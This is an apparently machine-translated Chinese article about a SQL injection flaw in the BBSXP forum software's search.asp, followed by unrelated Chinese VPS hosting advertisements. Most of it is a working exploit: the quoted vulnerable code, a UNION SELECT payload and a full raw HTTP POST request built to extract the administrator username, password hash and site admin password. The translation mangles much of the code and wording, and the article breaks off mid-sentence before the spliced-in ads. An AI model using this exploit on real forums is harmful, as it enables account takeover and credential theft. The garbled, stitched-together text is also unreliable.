bbsxp注入漏洞BBSXP injection vulnerability
BBSXP injection vulnerability
BBSXP injection vulnerability
The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly
-- I found a summary of the bbsxp5 sp1 vulnerability
There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.
After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.
BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.
But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes
BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.
Obviously there are Numbers and strings in the query that must
not be used as input values. You can't input as a value, whydo you enter it?
That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp
(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >
The < %top
If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")
DetectPost
If the Request (" menu ") = "ok" then
Search = Request (" search ")
Forumid forumid = Request (" ")
TimeLimit = Request (" TimeLimit ")
The content = the HTMLEncode (Request (" content ") )
Searchxm= the HTMLEncode (Request (" searchxm "))
Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )
Searchxm2 = replace (searchxm2, "@", "&")
If the content = empty then the content = Request. Cookies ("u sername ")
If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"
If the search = "author" then
The item = "&" searchxm& "= ' " & the content &" "
Elseif search = "key" then
The item= "&" searchxm2 & "like '%" & the content &%' ""End the if
If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"
SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""
"& TimeLimitList &" order by lasttime Desc"
Rs. The Open SQL, Conn, 1
. . . . . .
Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.
1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"
As long as the forumid input is empty, forumidor is empty.
2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "
TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",
Change to "and lasttime > getdate () -1" in MSSQL.
3. If the search = "author" then
The item= "&" searchxm& "= ' " & the content &" "
Elseif search = "key" then
The item= "&" searchxm2 & "like '%" & the content &%' ""End the if
As long as the search = "author",
If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,
As soon as we construct the input and pass the above statement,the SQL statement becomes:
Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'
And lasttime > now () - 1 order by lasttime Desc
There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.
Let' s look at the HTMLEncode function first
The function the HTMLEncode (fString)
FString = replace (fString, "; ", "& # 59;")
FString = server. The htmlencode (fString)
FString = replace (fString, "' ", "& # 39;")
FString = replace (fString, "-", "& # 45; & # 45;")
FString = replace (fString, "", " the & # 92; ")
FString = replace (fString, vbCrlf, "< br >")
The HTMLEncode = fString
End the function
The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.
There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,
It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit
It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and
The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use
Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,
Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from
[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword
= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.
And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.
The friend who knows the SQL statement will see it.
The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.
Here you can construct your own queries, and I give you areference.
Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,
I should also advise him to save energy and brain power.
(figure 1)
[2]
The construction is submitted as follows:
POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1
Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp
The Accept - Language: useful - cn
The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate
The user-agent: Mozilla / 4.
0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost: 8000
The Content - Length: 481
Connection: Keep Alive
The cache-control: no - Cache
Cookie: eremite = 0; Userpass =
E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =
OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0
The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.
Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.
Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC
CB % % % CB D1 F7
I've written an HTML page for the searchxm part, which can be
瓜云互联怎么样?瓜云互联之前商家使用的面板为WHMCS,目前商家已经正式更换到了魔方云的面板,瓜云互联商家主要提供中国香港和美国洛杉矶机房的套餐,香港采用CN2线路直连大陆,洛杉矶为高防vps套餐,三网回程CN2 GIA,提供超高的DDOS防御,瓜云互联商家承诺打死退款,目前商家提供了一个全场9折和充值的促销,有需要的朋友可以看看。点击进入:瓜云互联官方网站瓜云互联促销优惠:9折优惠码:联系在线客...
昨天我们很多小伙伴们应该都有看到,包括有隔壁的一些博主们都有发布Vultr商家新的新用户注册福利活动。以前是有赠送100美元有效期30天的,这次改成有效期14天。早年才开始的时候有效期是60天的,这个是商家行为,主要还是吸引到我们后续的充值使用,毕竟他们的体验金赠送,在同类商家中算是比较大方的。昨天活动内容:重新调整Vultr新注册用户赠送100美元奖励金有效期14天今天早上群里的朋友告诉我,两年...
轻云互联成立于2018年的国人商家,广州轻云互联网络科技有限公司旗下品牌,主要从事VPS、虚拟主机等云计算产品业务,适合建站、新手上车的值得选择,香港三网直连(电信CN2GIA联通移动CN2直连);美国圣何塞(回程三网CN2GIA)线路,所有产品均采用KVM虚拟技术架构,高效售后保障,稳定多年,高性能可用,网络优质,为您的业务保驾护航。官方网站:点击进入广州轻云网络科技有限公司活动规则:1.用户购...